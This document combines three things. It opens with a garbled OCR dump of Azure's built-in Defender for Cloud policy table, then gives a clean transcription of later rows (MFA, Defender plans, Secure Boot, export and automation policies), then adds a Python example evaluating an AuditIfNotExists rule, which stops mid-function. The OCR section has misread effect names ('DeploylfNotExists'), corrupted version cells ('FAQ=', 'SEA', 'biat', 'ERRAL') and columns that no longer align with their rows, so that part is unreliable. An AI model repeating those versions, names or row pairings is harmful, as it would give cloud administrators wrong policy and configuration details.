Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


Version 


(GitHub) 


2.0.0- 
preview E 


6.1.0- 
preview E 


5.0.0- 
preview 7 


7.0.0- 
preview E 


FAQ= 
preview E 


2.0.0- 
preview E 


1.0.0- 
preview E 


5.10- 
preview E 


SEA 
preview E 


Name 


(Azure portal) 


virtual machine scale 
sets to automatically 
install the Azure 
Security agent £ 


[Preview]: Configure 
supported Windows 
virtual machine scale 
sets to automatically 
install the Guest 
Attestation extension č 


[Preview]: Configure 
supported Windows 
virtual machines to 
automatically enable 
Secure Boot £ 


[Preview]: Configure 
supported Windows 
virtual machines to 
automatically install the 
Guest Attestation 
extension Z 


[Preview]: Configure the 
Microsoft Defender for 
SQL Log Analytics 
workspace 7 


[Preview]: Configure 
virtual machines to 
create the default 
Microsoft Defender for 
Cloud pipeline using 
Azure Monitor Agent Z 


[Preview]: Configure 
VMs created with 
Shared Image Gallery 
images to install the 
Guest Attestation 
extension Z 


[Preview]: Configure 
VMSS created with 
Shared Image Gallery 
images to install the 
Guest Attestation 
extension E 


[Preview]: Create and 
assign a built-in user- 


Description 


Center collects events from the agent and uses them to 
provide security alerts and tailored hardening tasks 
(recommendations). Target Windows virtual machine scale 
sets must be in a supported location. 


Configure supported Windows virtual machines scale sets 
to automatically install the Guest Attestation extension to 
allow Azure Security Center to proactively attest and 
monitor the boot integrity. Boot integrity is attested via 
Remote Attestation. 


Configure supported Windows virtual machines to 
automatically enable Secure Boot to mitigate against 
malicious and unauthorized changes to the boot chain. 
Once enabled, only trusted bootloaders, kernel and kernel 
drivers will be allowed to run. 


Configure supported Windows virtual machines to 
automatically install the Guest Attestation extension to 
allow Azure Security Center to proactively attest and 
monitor the boot integrity. Boot integrity is attested via 
Remote Attestation. 


Microsoft Defender for SQL collects events from the agent 
and uses them to provide security alerts and tailored 
hardening tasks (recommendations). Create a resource 
group and Log Analytics workspace in the same region as 
the machine. 


Configure virtual machines to create the default Microsoft 
Defender for Cloud pipeline using Azure Monitor Agent. 
Microsoft Defender for Cloud collects events from the 
agent and uses them to provide security alerts and tailored 
hardening tasks (recommendations). Create a resource 
group, a Data Collection Rule and Log Analytics workspace 
in the same region as the machine to store audit records. 
Target virtual machines must be in a supported location. 


Configure virtual machines created with Shared Image 


Gallery images to automatically install the Guest Attestation 


extension to allow Azure Security Center to proactively 
attest and monitor the boot integrity. Boot integrity is 
attested via Remote Attestation. 


Configure VMSS created with Shared Image Gallery images 
to automatically install the Guest Attestation extension to 
allow Azure Security Center to proactively attest and 
monitor the boot integrity. Boot integrity is attested via 
Remote Attestation. 


Create and assign a built-in user-assigned managed 
identity at scale to SQL virtual machines. 


Effect(s) 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


AuditlfNotExists, 
DeploylfNotExists, 
Disabled 


Version 


(GitHub) 


4.1.0- 
preview E 


3.0.0- 
preview E 


5. 1,0 
preview E 


1.0.1- 
preview E 


5.2.0- 
preview E 


2.0.0- 
preview E 


2:1.0- 
preview E 


biat 
preview E 


Name 


(Azure portal) 


assigned managed 
identity E 


[Preview]: Deploy 
Microsoft Defender for 
Endpoint agent on 
Linux hybrid machines ¢ 


[Preview]: Deploy 
Microsoft Defender for 
Endpoint agent on 
Linux virtual machines 2 


[Preview]: Deploy 
Microsoft Defender for 
Endpoint agent on 
Windows Azure Arc 
machines E 


[Preview]: Deploy 
Microsoft Defender for 
Endpoint agent on 
Windows virtual 
machines E 


[Preview]: Guest 
Attestation extension 
should be installed on 
supported Linux virtual 
machines E 


[Preview]: Guest 
Attestation extension 
should be installed on 
supported Linux virtual 
machines scale sets E 


[Preview]: Guest 
Attestation extension 
should be installed on 
supported Windows 
virtual machines S 


[Preview]: Guest 
Attestation extension 
should be installed on 
supported Windows 
virtual machines scale 
sets’ 


[Preview]: Linux virtual 
machines should use 
only signed and trusted 
boot components E 


Description 


Deploys Microsoft Defender for Endpoint agent on Linux 
hybrid machines 


Deploys Microsoft Defender for Endpoint agent on 
applicable Linux VM images. 


Deploys Microsoft Defender for Endpoint on Windows 
Azure Arc machines. 


Deploys Microsoft Defender for Endpoint on applicable 
Windows VM images. 


Install Guest Attestation extension on supported Linux 
virtual machines to allow Azure Security Center to 
proactively attest and monitor the boot integrity. Once 
installed, boot integrity will be attested via Remote 
Attestation. This assessment applies to Trusted Launch and 
Confidential Linux virtual machines. 


Install Guest Attestation extension on supported Linux 
virtual machines scale sets to allow Azure Security Center 
to proactively attest and monitor the boot integrity. Once 
installed, boot integrity will be attested via Remote 
Attestation. This assessment applies to Trusted Launch and 
Confidential Linux virtual machine scale sets. 


Install Guest Attestation extension on supported virtual 
machines to allow Azure Security Center to proactively 
attest and monitor the boot integrity. Once installed, boot 
integrity will be attested via Remote Attestation. This 
assessment applies to Trusted Launch and Confidential 
Windows virtual machines. 


Install Guest Attestation extension on supported virtual 
machines scale sets to allow Azure Security Center to 
proactively attest and monitor the boot integrity. Once 
installed, boot integrity will be attested via Remote 
Attestation. This assessment applies to Trusted Launch and 
Confidential Windows virtual machine scale sets. 


All OS boot components (boot loader, kernel, kernel 
drivers) must be signed by trusted publishers. Defender for 
Cloud has identified untrusted OS boot components on 
one or more of your Linux machines. To protect your 
machines from potentially malicious components, add 


Effect(s) 


DeploylfNotExists, 
AuditlfNotExists, 
Disabled 


DeploylfNotExists, 
AuditlfNotExists, 
Disabled 


DeploylfNotExists, 
AuditlfNotExists, 
Disabled 


DeploylfNotExists, 
AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


Version 


(GitHub) 


2.0.1- 
preview E 


3.0.0- 
preview E 


2.0.1 
preview E 


2.0.1- 
preview E 


6.0.0- 
preview E 


5: 1,0 
preview E 


4.0.0- 
preview E 


ERRAL 
preview E 


1.0.0- 
preview E 


Name 


(Azure portal) 


[Preview]: Linux virtual 
machines should use 
Secure Boot Z 


[Preview]: Machines 
should have ports 
closed that might 
expose attack vectors 7 


[Preview]: Microsoft 
Defender for APIs 
should be enabled zZ 


[Preview]: Secure Boot 
should be enabled on 
supported Windows 
virtual machines 7 


[Preview]: System 
updates should be 
installed on your 
machines (powered by 
Update Center) Z 


[Preview]: Virtual 
machines guest 
attestation status 
should be healthy 7 


[Preview]: vTPM should 
be enabled on 
supported virtual 
machines 7 


A maximum of 3 
owners should be 
designated for your 
subscription Z 


A vulnerability 
assessment solution 


Description 


them to your allow list or remove the identified 
components. 


To protect against the installation of malware-based 
rootkits and boot kits, enable Secure Boot on supported 
Linux virtual machines. Secure Boot ensures that only 
signed operating systems and drivers will be allowed to 
run. This assessment only applies to Linux virtual machines 
that have the Azure Monitor Agent installed. 


Azure's Terms Of Use prohibit the use of Azure services in 
ways that could damage, disable, overburden, or impair any 
Microsoft server, or the network. The exposed ports 
identified by this recommendation need to be closed for 
your continued security. For each identified port, the 
recommendation also provides an explanation of the 
potential threat. 


Microsoft Defender for APIs brings new discovery, 
protection, detection, & response coverage to monitor for 
common API based attacks & security misconfigurations. 


Enable Secure Boot on supported Windows virtual 
machines to mitigate against malicious and unauthorized 
changes to the boot chain. Once enabled, only trusted 
bootloaders, kernel and kernel drivers will be allowed to 
run. This assessment applies to Trusted Launch and 
Confidential Windows virtual machines. 


Your machines are missing system, security, and critical 
updates. Software updates often include critical patches to 
security holes. Such holes are frequently exploited in 
malware attacks so it's vital to keep your software updated. 
To install all outstanding patches and secure your 
machines, follow the remediation steps. 


Guest attestation is performed by sending a trusted log 
(TCGLog) to an attestation server. The server uses these 
logs to determine whether boot components are 
trustworthy. This assessment is intended to detect 
compromises of the boot chain which might be the result 
of a bootkit or rootkit infection. This assessment only 
applies to Trusted Launch enabled virtual machines that 
have Guest Attestation extension installed. 


Enable virtual TPM device on supported virtual machines to 
facilitate Measured Boot and other OS security features 
that require a TPM. Once enabled, vTPM can be used to 
attest boot integrity. This assessment only applies to 
trusted launch enabled virtual machines. 


It is recommended to designate up to 3 subscription 
owners in order to reduce the potential for breach by a 
compromised owner. 


Audits virtual machines to detect whether they are running 
a supported vulnerability assessment solution. A core 


Effect(s) 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


Audit, Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


Audit, Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


Version 


Version (GitHub) column, continued from the rows on the previous page (their names are not on this page): 1.0.0-preview, 1.0.0-preview, 1.0.2-preview, 4.0.0-preview, 1.0.0-preview, 1.0.0-preview, 2.0.0-preview.

Each row below gives the four columns of the built-in policy table: Name (Azure portal), Description, Effect(s), Version (GitHub).

Name (Azure portal): … should be enabled on your virtual machines (name cut off at the page break)
Description: … component of every cyber risk and security program is the identification and analysis of vulnerabilities. Azure Security Center's standard pricing tier includes vulnerability scanning for your virtual machines at no extra cost. Additionally, Security Center can automatically deploy this tool for you.
Effect(s): (not on this page)
Version (GitHub): 3.0.0

Name (Azure portal): Accounts with owner permissions on Azure resources should be MFA enabled
Description: Multi-Factor Authentication (MFA) should be enabled for all subscription accounts with owner permissions to prevent a breach of accounts or resources.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.0

Name (Azure portal): Accounts with read permissions on Azure resources should be MFA enabled
Description: Multi-Factor Authentication (MFA) should be enabled for all subscription accounts with read privileges to prevent a breach of accounts or resources.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.0

Name (Azure portal): Accounts with write permissions on Azure resources should be MFA enabled
Description: Multi-Factor Authentication (MFA) should be enabled for all subscription accounts with write privileges to prevent a breach of accounts or resources.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.0

Name (Azure portal): Adaptive application controls for defining safe applications should be enabled on your machines
Description: Enable application controls to define the list of known-safe applications running on your machines, and alert you when other applications run. This helps harden your machines against malware. To simplify the process of configuring and maintaining your rules, Security Center uses machine learning to analyze the applications running on each machine and suggest the list of known-safe applications.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 3.0.0

Name (Azure portal): Adaptive network hardening recommendations should be applied on internet facing virtual machines
Description: Azure Security Center analyzes the traffic patterns of Internet facing virtual machines and provides Network Security Group rule recommendations that reduce the potential attack surface.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 3.0.0

Name (Azure portal): All network ports should be restricted on network security groups associated to your virtual machine
Description: Azure Security Center has identified some of your network security groups' inbound rules to be too permissive. Inbound rules should not allow access from 'Any' or 'Internet' ranges. This can potentially enable attackers to target your resources.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 3.0.0

Name (Azure portal): Allowlist rules in your adaptive application control policy should be updated
Description: Monitor for changes in behavior on groups of machines configured for auditing by Azure Security Center's adaptive application controls. Security Center uses machine learning to analyze the running processes on your machines and suggest a list of known-safe applications. These are presented as recommended apps to allow in adaptive application control policies.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 3.0.0

Name (Azure portal): Authorized IP ranges should be defined on Kubernetes Services
Description: Restrict access to the Kubernetes Service Management API by granting API access only to IP addresses in specific ranges. It is recommended to limit access to authorized IP ranges to ensure that only applications from allowed networks can access the cluster.
Effect(s): Audit, Disabled
Version (GitHub): 2.0.1


Name (Azure portal): Auto provisioning of the Log Analytics agent should be enabled on your subscription
Description: To monitor for security vulnerabilities and threats, Azure Security Center collects data from your Azure virtual machines. Data is collected by the Log Analytics agent, formerly known as the Microsoft Monitoring Agent (MMA), which reads various security-related configurations and event logs from the machine and copies the data to your Log Analytics workspace for analysis. We recommend enabling auto provisioning to automatically deploy the agent to all supported Azure VMs and any new ones that are created.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.1

Name (Azure portal): Azure DDoS Protection Standard should be enabled
Description: DDoS protection standard should be enabled for all virtual networks with a subnet that is part of an application gateway with a public IP.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 3.0.0

Name (Azure portal): Azure Defender for App Service should be enabled
Description: Azure Defender for App Service leverages the scale of the cloud, and the visibility that Azure has as a cloud provider, to monitor for common web app attacks.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.3

Name (Azure portal): Azure Defender for Azure SQL Database servers should be enabled
Description: Azure Defender for SQL provides functionality for surfacing and mitigating potential database vulnerabilities, detecting anomalous activities that could indicate threats to SQL databases, and discovering and classifying sensitive data.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.2

Name (Azure portal): Azure Defender for DNS should be enabled
Description: Azure Defender for DNS provides an additional layer of protection for your cloud resources by continuously monitoring all DNS queries from your Azure resources. Azure Defender alerts you about suspicious activity at the DNS layer. Learn more about the capabilities of Azure Defender for DNS at https://aka.ms/defender-for-dns. Enabling this Azure Defender plan results in charges. Learn about the pricing details per region on Security Center's pricing page: https://aka.ms/pricing-security-center.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.0

Name (Azure portal): Azure Defender for Key Vault should be enabled
Description: Azure Defender for Key Vault provides an additional layer of protection and security intelligence by detecting unusual and potentially harmful attempts to access or exploit key vault accounts.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.3

Name (Azure portal): Azure Defender for open-source relational databases should be enabled
Description: Azure Defender for open-source relational databases detects anomalous activities indicating unusual and potentially harmful attempts to access or exploit databases. Learn more about the capabilities of Azure Defender for open-source relational databases at https://aka.ms/AzDforOpenSourceDBsDocu. Important: Enabling this plan will result in charges for protecting your open-source relational databases. Learn about the pricing on Security Center's pricing page: https://aka.ms/pricing-security-center.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.0

Name (Azure portal): Azure Defender for Resource Manager should be enabled
Description: Azure Defender for Resource Manager automatically monitors the resource management operations in your organization. Azure Defender detects threats and alerts you about suspicious activity. Learn more about the capabilities of Azure Defender for Resource Manager at https://aka.ms/defender-for-resource-manager. Enabling this Azure Defender plan results in charges. Learn about the pricing details per region on Security Center's pricing page: https://aka.ms/pricing-security-center.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.0

Name (Azure portal): Azure Defender for servers should be enabled
Description: Azure Defender for servers provides real-time threat protection for server workloads and generates hardening recommendations as well as alerts about suspicious activities.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.3

Name (Azure portal): Azure Defender for SQL servers on machines should be enabled
Description: Azure Defender for SQL provides functionality for surfacing and mitigating potential database vulnerabilities, detecting anomalous activities that could indicate threats to SQL databases, and discovering and classifying sensitive data.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.2

Name (Azure portal): Azure Role-Based Access Control (RBAC) should be used on Kubernetes Services
Description: To provide granular filtering on the actions that users can perform, use Azure Role-Based Access Control (RBAC) to manage permissions in Kubernetes Service Clusters and configure relevant authorization policies.
Effect(s): Audit, Disabled
Version (GitHub): 1.0.3

Name (Azure portal): Blocked accounts with owner permissions on Azure resources should be removed
Description: Deprecated accounts with owner permissions should be removed from your subscription. Deprecated accounts are accounts that have been blocked from signing in.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.0

Name (Azure portal): Blocked accounts with read and write permissions on Azure resources should be removed
Description: Deprecated accounts should be removed from your subscriptions. Deprecated accounts are accounts that have been blocked from signing in.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.0

Name (Azure portal): Cloud Services (extended support) role instances should be configured securely
Description: Protect your Cloud Services (extended support) role instances from attacks by ensuring they are not exposed to any OS vulnerabilities.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.0

Name (Azure portal): Cloud Services (extended support) role instances should have an endpoint protection solution installed
Description: Protect your Cloud Services (extended support) role instances from threats and vulnerabilities by ensuring an endpoint protection solution is installed on them.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.0

Name (Azure portal): Cloud Services (extended support) role instances should have system updates installed
Description: Secure your Cloud Services (extended support) role instances by ensuring the latest security and critical updates are installed on them.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.0

Name (Azure portal): Configure Azure Defender for App Service to be enabled
Description: Azure Defender for App Service leverages the scale of the cloud, and the visibility that Azure has as a cloud provider, to monitor for common web app attacks.
Effect(s): DeployIfNotExists, Disabled
Version (GitHub): 1.0.1

Name (Azure portal): Configure Azure Defender for Azure SQL database to be enabled
Description: Azure Defender for SQL provides functionality for surfacing and mitigating potential database vulnerabilities, detecting anomalous activities that could indicate threats to SQL databases, and discovering and classifying sensitive data.
Effect(s): DeployIfNotExists, Disabled
Version (GitHub): 1.0.1

Name (Azure portal): Configure Azure Defender for DNS to be enabled
Description: Azure Defender for DNS provides an additional layer of protection for your cloud resources by continuously monitoring all DNS queries from your Azure resources. Azure Defender alerts you about suspicious activity at the DNS layer. Learn more about the capabilities of Azure Defender for DNS at https://aka.ms/defender-for-dns. Enabling this Azure Defender plan results in charges. Learn about the pricing details per region on Security Center's pricing page: https://aka.ms/pricing-security-center.
Effect(s): DeployIfNotExists, Disabled
Version (GitHub): 1.0.2

Name (Azure portal): Configure Azure Defender for Key Vaults to be enabled
Description: Azure Defender for Key Vault provides an additional layer of protection and security intelligence by detecting unusual and potentially harmful attempts to access or exploit key vault accounts.
Effect(s): DeployIfNotExists, Disabled
Version (GitHub): 1.0.2

Name (Azure portal): Configure Azure Defender for open-source relational databases to be enabled
Description: Azure Defender for open-source relational databases detects anomalous activities indicating unusual and potentially harmful attempts to access or exploit databases. Learn more about the capabilities of Azure Defender for open-source relational databases at https://aka.ms/AzDforOpenSourceDBsDocu. Important: Enabling this plan will result in charges for protecting your open-source relational databases. Learn about the pricing on Security Center's pricing page: https://aka.ms/pricing-security-center.
Effect(s): DeployIfNotExists, Disabled
Version (GitHub): 1.0.0

Name (Azure portal): Configure Azure Defender for Resource Manager to be enabled
Description: Azure Defender for Resource Manager automatically monitors the resource management operations in your organization. Azure Defender detects threats and alerts you about suspicious activity. Learn more about the capabilities of Azure Defender for Resource Manager at https://aka.ms/defender-for-resource-manager. Enabling this Azure Defender plan results in charges. Learn about the pricing details per region on Security Center's pricing page: https://aka.ms/pricing-security-center.
Effect(s): DeployIfNotExists, Disabled
Version (GitHub): 1.0.2

Name (Azure portal): Configure Azure Defender for servers to be enabled
Description: Azure Defender for servers provides real-time threat protection for server workloads and generates hardening recommendations as well as alerts about suspicious activities.
Effect(s): DeployIfNotExists, Disabled
Version (GitHub): 1.0.1

Name (Azure portal): Configure Azure Defender for SQL servers on machines to be enabled
Description: Azure Defender for SQL provides functionality for surfacing and mitigating potential database vulnerabilities, detecting anomalous activities that could indicate threats to SQL databases, and discovering and classifying sensitive data.
Effect(s): DeployIfNotExists, Disabled
Version (GitHub): 1.0.1

Name (Azure portal): Configure basic Microsoft Defender for Storage to be enabled (Activity Monitoring only)
Description: Microsoft Defender for Storage is an Azure-native layer of security intelligence that detects potential threats to your storage accounts. This policy will enable the basic Defender for Storage capabilities (Activity Monitoring). To enable full protection, which also includes On-upload Malware Scanning and Sensitive Data Threat Detection, use the full enablement policy: aka.ms/DefenderForStoragePolicy. To learn more about Defender for Storage capabilities and benefits, visit aka.ms/DefenderForStorage.
Effect(s): DeployIfNotExists, Disabled
Version (GitHub): 1.0.8

Name (Azure portal): Configure machines to receive a vulnerability assessment provider
Description: Azure Defender includes vulnerability scanning for your machines at no extra cost. You don't need a Qualys license or even a Qualys account; everything is handled inside Security Center. When you enable this policy, Azure Defender automatically deploys the Qualys vulnerability assessment provider to all supported machines that don't already have it installed.
Effect(s): DeployIfNotExists, Disabled
Version (GitHub): 4.0.0

Name (Azure portal): Configure Microsoft Defender CSPM to be enabled
Description: Defender Cloud Security Posture Management (CSPM) provides enhanced posture capabilities and a new intelligent cloud security graph to help identify, prioritize, and reduce risk. Defender CSPM is available in addition to the free foundational security posture capabilities turned on by default in Defender for Cloud.
Effect(s): DeployIfNotExists, Disabled
Version (GitHub): 1.0.2

Name (Azure portal): Configure Microsoft Defender for Azure Cosmos DB to be enabled
Description: Microsoft Defender for Azure Cosmos DB is an Azure-native layer of security that detects attempts to exploit databases in your Azure Cosmos DB accounts. Defender for Azure Cosmos DB detects potential SQL injections, known bad actors based on Microsoft Threat Intelligence, suspicious access patterns, and potential exploitations of your database through compromised identities or malicious insiders.
Effect(s): DeployIfNotExists, Disabled
Version (GitHub): 1.0.0

Name (Azure portal): Configure Microsoft Defender for Containers to be enabled
Description: Microsoft Defender for Containers provides hardening, vulnerability assessment and run-time protections for your Azure, hybrid, and multi-cloud Kubernetes environments.
Effect(s): DeployIfNotExists, Disabled
Version (GitHub): 1.0.1

Name (Azure portal): Configure Microsoft Defender for SQL to be enabled on Synapse workspaces
Description: Enable Microsoft Defender for SQL on your Azure Synapse workspaces to detect anomalous activities indicating unusual and potentially harmful attempts to access or exploit SQL databases.
Effect(s): DeployIfNotExists, Disabled
Version (GitHub): 1.0.0

Name (Azure portal): Configure Microsoft Defender for Storage (Classic) to be enabled
Description: Microsoft Defender for Storage (Classic) provides detections of unusual and potentially harmful attempts to access or exploit storage accounts.
Effect(s): DeployIfNotExists, Disabled
Version (GitHub): 1.0.2

Name (Azure portal): Configure Microsoft Defender for Storage to be enabled
Description: Microsoft Defender for Storage is an Azure-native layer of security intelligence that detects potential threats to your storage accounts. This policy will enable all Defender for Storage capabilities: Activity Monitoring, Malware Scanning and Sensitive Data Threat Detection. To learn more about Defender for Storage capabilities and benefits, visit aka.ms/DefenderForStorage.
Effect(s): DeployIfNotExists, Disabled
Version (GitHub): 1.1.0

Name (Azure portal): Container registry images should have vulnerability findings resolved
Description: Container image vulnerability assessment scans your registry for security vulnerabilities and exposes detailed findings for each image. Resolving the vulnerabilities can greatly improve your containers' security posture and protect them from attacks.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 2.0.1

Name (Azure portal): Container registry images should have vulnerability findings resolved (powered by Microsoft Defender Vulnerability Management)
Description: Container image vulnerability assessment scans your registry for commonly known vulnerabilities (CVEs) and provides a detailed vulnerability report for each image. Resolving vulnerabilities can greatly improve your security posture, ensuring images are safe to use prior to deployment.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.0

Name (Azure portal): Deploy - Configure suppression rules for Azure Security Center alerts
Description: Suppress Azure Security Center alerts to reduce alert fatigue by deploying suppression rules on your management group or subscription.
Effect(s): deployIfNotExists
Version (GitHub): 1.0.0

Name (Azure portal): Deploy export to Event Hub as a trusted service for Microsoft Defender for Cloud data
Description: Enable export to Event Hub as a trusted service of Microsoft Defender for Cloud data. This policy deploys an export to Event Hub as a trusted service configuration with your conditions and target Event Hub on the assigned scope. To deploy this policy on newly created subscriptions, open the Compliance tab, select the relevant non-compliant assignment and create a remediation task.
Effect(s): DeployIfNotExists, Disabled
Version (GitHub): 1.0.0

Name (Azure portal): Deploy export to Event Hub for Microsoft Defender for Cloud data
Description: Enable export to Event Hub of Microsoft Defender for Cloud data. This policy deploys an export to Event Hub configuration with your conditions and target Event Hub on the assigned scope. To deploy this policy on newly created subscriptions, open the Compliance tab, select the relevant non-compliant assignment and create a remediation task.
Effect(s): deployIfNotExists
Version (GitHub): 4.2.0

Name (Azure portal): Deploy export to Log Analytics workspace for Microsoft Defender for Cloud data
Description: Enable export to Log Analytics workspace of Microsoft Defender for Cloud data. This policy deploys an export to Log Analytics workspace configuration with your conditions and target workspace on the assigned scope. To deploy this policy on newly created subscriptions, open the Compliance tab, select the relevant non-compliant assignment and create a remediation task.
Effect(s): deployIfNotExists
Version (GitHub): 4.1.0

Name (Azure portal): Deploy Workflow Automation for Microsoft Defender for Cloud alerts
Description: Enable automation of Microsoft Defender for Cloud alerts. This policy deploys a workflow automation with your conditions and triggers on the assigned scope. To deploy this policy on newly created subscriptions, open the Compliance tab, select the relevant non-compliant assignment and create a remediation task.
Effect(s): deployIfNotExists
Version (GitHub): 5.0.1

Name (Azure portal): Deploy Workflow Automation for Microsoft Defender for Cloud recommendations
Description: Enable automation of Microsoft Defender for Cloud recommendations. This policy deploys a workflow automation with your conditions and triggers on the assigned scope. To deploy this policy on newly created subscriptions, open the Compliance tab, select the relevant non-compliant assignment and create a remediation task.
Effect(s): deployIfNotExists
Version (GitHub): 5.0.1

Name (Azure portal): Deploy Workflow Automation for Microsoft Defender for Cloud regulatory compliance
Description: Enable automation of Microsoft Defender for Cloud regulatory compliance. This policy deploys a workflow automation with your conditions and triggers on the assigned scope. To deploy this policy on newly created subscriptions, open the Compliance tab, select the relevant non-compliant assignment and create a remediation task.
Effect(s): deployIfNotExists
Version (GitHub): 5.0.1

Name (Azure portal): Email notification for high severity alerts should be enabled
Description: To ensure the relevant people in your organization are notified when there is a potential security breach in one of your subscriptions, enable email notifications for high severity alerts in Security Center.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.1

Name (Azure portal): Email notification to subscription owner for high severity alerts should be enabled
Description: To ensure your subscription owners are notified when there is a potential security breach in their subscription, set email notifications to subscription owners for high severity alerts in Security Center.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 2.0.0
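The Effect(s) column decides what an assignment actually does when a resource fails its check, and the repeated advice to "create a remediation task" follows from how DeployIfNotExists behaves: the deployment runs automatically only when a resource is created or updated, so resources that already existed at assignment time stay non-compliant until a remediation task is created. The Python below is an added example, not Microsoft's policy engine: it evaluates one rule written in Azure Policy's if/then/details layout, modelled on the "Azure Defender for servers should be enabled" row, over a constructed inventory. The inventory, the handling of the Microsoft.Security/pricings/pricingTier alias, and the subset of condition operators supported are this example's assumptions.

```python
from __future__ import annotations

import re
from typing import Any

# Constructed sample inventory (not real Azure data): subscriptions and their
# Microsoft.Security/pricings children, the resource a "... should be enabled"
# row in this table looks for. vm1 is there to show out-of-scope resources.
INVENTORY: list[dict[str, Any]] = [
    {"id": "/subscriptions/sub-a", "type": "Microsoft.Resources/subscriptions", "name": "sub-a",
     "children": [{"type": "Microsoft.Security/pricings", "name": "VirtualMachines",
                   "properties": {"pricingTier": "Standard"}}]},
    {"id": "/subscriptions/sub-b", "type": "Microsoft.Resources/subscriptions", "name": "sub-b",
     "children": [{"type": "Microsoft.Security/pricings", "name": "VirtualMachines",
                   "properties": {"pricingTier": "Free"}}]},
    {"id": "/subscriptions/sub-c", "type": "Microsoft.Resources/subscriptions", "name": "sub-c",
     "children": []},
    {"id": "/subscriptions/sub-a/resourceGroups/rg/providers/Microsoft.Compute/virtualMachines/vm1",
     "type": "Microsoft.Compute/virtualMachines", "name": "vm1", "children": []},
]

# Rule in the if/then/details shape Azure Policy uses. The effect is parameterised,
# which is what "AuditIfNotExists, Disabled" in the Effect(s) column means. The
# alias name and the "VirtualMachines" pricing child are this example's assumptions.
SERVERS_PLAN_RULE: dict[str, Any] = {
    "if": {"field": "type", "equals": "Microsoft.Resources/subscriptions"},
    "then": {
        "effect": "[parameters('effect')]",
        "details": {
            "type": "Microsoft.Security/pricings",
            "name": "VirtualMachines",
            "existenceCondition": {"field": "Microsoft.Security/pricings/pricingTier",
                                   "equals": "Standard"},
        },
    },
}

_PARAM_RE = re.compile(r"^\[parameters\('(\w+)'\)\]$")


def resolve(value: Any, params: dict[str, Any]) -> Any:
    """Resolve a "[parameters('x')]" reference; anything else is a literal."""
    if isinstance(value, str) and (m := _PARAM_RE.match(value)):
        return params[m.group(1)]
    return value


def get_field(resource: dict[str, Any], field: str) -> Any:
    """Top-level fields by name; "<type>/<path>" aliases resolve into properties."""
    if field in ("type", "name", "id", "location"):
        return resource.get(field)
    rtype = resource.get("type", "")
    if field.lower().startswith(rtype.lower() + "/"):
        node: Any = resource.get("properties", {})
        for part in field[len(rtype) + 1:].split("/"):
            node = node.get(part) if isinstance(node, dict) else None
        return node
    return None


def _norm(v: Any) -> Any:
    return v.lower() if isinstance(v, str) else v  # Azure string compares are case-insensitive


def matches(cond: dict[str, Any] | None, resource: dict[str, Any]) -> bool:
    """Evaluate a condition block: allOf / anyOf / not, or a leaf on one field."""
    if cond is None:
        return True  # an omitted existenceCondition means any related resource counts
    if "allOf" in cond:
        return all(matches(c, resource) for c in cond["allOf"])
    if "anyOf" in cond:
        return any(matches(c, resource) for c in cond["anyOf"])
    if "not" in cond:
        return not matches(cond["not"], resource)
    actual = _norm(get_field(resource, cond["field"]))
    if "equals" in cond:
        return actual == _norm(cond["equals"])
    if "notEquals" in cond:
        return actual != _norm(cond["notEquals"])
    if "in" in cond:
        return actual in {_norm(v) for v in cond["in"]}
    if "exists" in cond:
        return (actual is not None) == (str(cond["exists"]).lower() == "true")
    raise ValueError(f"unsupported condition: {cond}")


def evaluate(rule: dict[str, Any], params: dict[str, Any],
             resources: list[dict[str, Any]]) -> list[dict[str, str]]:
    """One verdict per in-scope resource for Audit, AuditIfNotExists and
    DeployIfNotExists; Disabled evaluates nothing at all."""
    effect = resolve(rule["then"]["effect"], params)
    details = rule["then"].get("details", {})
    verdicts: list[dict[str, str]] = []
    for r in resources:
        if effect == "Disabled" or not matches(rule["if"], r):
            continue
        if effect == "Audit":  # Audit flags the matching resource itself
            verdicts.append({"id": r["id"], "state": "NonCompliant", "action": "log only"})
            continue
        related = [c for c in r.get("children", [])
                   if _norm(c["type"]) == _norm(details["type"])
                   and ("name" not in details or _norm(c["name"]) == _norm(details["name"]))]
        if any(matches(details.get("existenceCondition"), c) for c in related):
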